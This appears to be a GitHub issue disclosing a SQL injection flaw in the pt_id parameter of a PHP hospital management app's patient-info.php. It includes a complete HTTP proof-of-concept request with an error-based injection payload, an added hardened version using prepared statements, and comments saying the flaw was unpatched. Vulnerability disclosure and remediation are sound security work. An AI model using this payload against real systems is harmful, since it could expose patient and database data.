SQL injection vulnerability in the Hospital Management Center search box #1

Closed
huclilu opened this issue Nov 15, 2022 · 4 comments

huclilu commented Nov 15, 2022

SQL injection vulnerability in the Hospital Management Center search box

Build environment: Apache 2.4.39; MySQL 5.7.26; PHP 7.3.4

1. Vulnerability analysis

In the file patient-info.php, at code lines 87 - 90, the pt_id parameter passed by POST is assigned to $pt_id, and $pt_id is then brought into the database query without any filtering. mysqli_query returns the database connection information and the results of SQL statement execution. Because the error message is not masked, SQL injection vulnerabilities are created.

  • We can use sqlmap to validate

  • Manual SQL injection proof

2. POC:

POST /patient-info.php HTTP/1.1
Host: vulhms.test
Content-Length: 160
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://vulhms.test
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://vulhms.test/patient-info.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=iljducsilkhqvpp8up2b3uv1rg
Connection: close

pt_id=1' or (select 1174 from(select count(*),concat((select user()),floor(rand(0)*2))x from information_schema.tables group by x)a) and 'ace'='ace&pt_btn=Go%21

huclilu closed this as completed Nov 16, 2022
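
A hardened form of the lookup described in the report above, as an added example that is not part of the original issue and is not the project's code. The table and column names (`patients`, `pt_id`, `pt_name`), the `find_patient()` helper and the `DB_*` environment variables are assumptions, as is the commented-out shape of the flawed pattern.

```php
<?php
// Added example, not the project's code. Table and column names (patients,
// pt_id, pt_name), find_patient() and the DB_* variables are hypothetical.

// Make mysqli throw exceptions so failures are handled in one place.
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);

// Assumed shape of the pattern the report describes (kept as a comment):
//   $pt_id  = $_POST['pt_id'];
//   $result = mysqli_query($conn, "SELECT * FROM patients WHERE pt_id = '$pt_id'");
//   if (!$result) { die(mysqli_error($conn)); }   // driver error reaches the client

function find_patient(mysqli $conn, $rawId): ?array
{
    // Reject anything that is not a short string of digits
    // (assumes patient IDs are numeric).
    if (!is_string($rawId) || !ctype_digit($rawId) || strlen($rawId) > 9) {
        return null;
    }
    $id = (int) $rawId;

    // The value travels as a bound parameter, never as part of the SQL text.
    $stmt = $conn->prepare('SELECT pt_id, pt_name FROM patients WHERE pt_id = ?');
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();   // get_result() needs mysqlnd
    $stmt->close();

    return $row ?: null;
}

if (($_SERVER['REQUEST_METHOD'] ?? '') === 'POST') {
    try {
        $conn = new mysqli(getenv('DB_HOST'), getenv('DB_USER'),
                           getenv('DB_PASS'), getenv('DB_NAME'));
        $row = find_patient($conn, $_POST['pt_id'] ?? null);
        echo $row
            ? htmlspecialchars($row['pt_name'], ENT_QUOTES, 'UTF-8')
            : 'No matching patient.';
    } catch (mysqli_sql_exception $e) {
        // Details go to the server log; the client gets a generic message.
        error_log('patient lookup failed: ' . $e->getMessage());
        http_response_code(500);
        echo 'Internal error.';
    }
}
```

With the value bound as an integer parameter, the quote in the POC body never reaches the SQL parser, and a failed query no longer echoes driver output to the response.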
@Cristian-Bejan
@huclilu Hi, was this vulnerability patched?

huclilu commented Nov 21, 2022

> @huclilu Hi, was this vulnerability patched?

Oh, guys, no, this vulnerability has not been repaired, but no one replies

@Cristian-Bejan

> > @huclilu Hi, was this vulnerability patched?
>
> Oh, guys, no, this vulnerability has not been repaired, but no one replies

Thank you! I appreciate the quick reply.

huclilu commented Nov 21, 2022

> > > @huclilu Hi, was this vulnerability patched?
> >
> > Oh, guys, no, this vulnerability has not been repaired, but no one replies
>
> Thank you! I appreciate the quick reply.

You are welcome, have a good day!
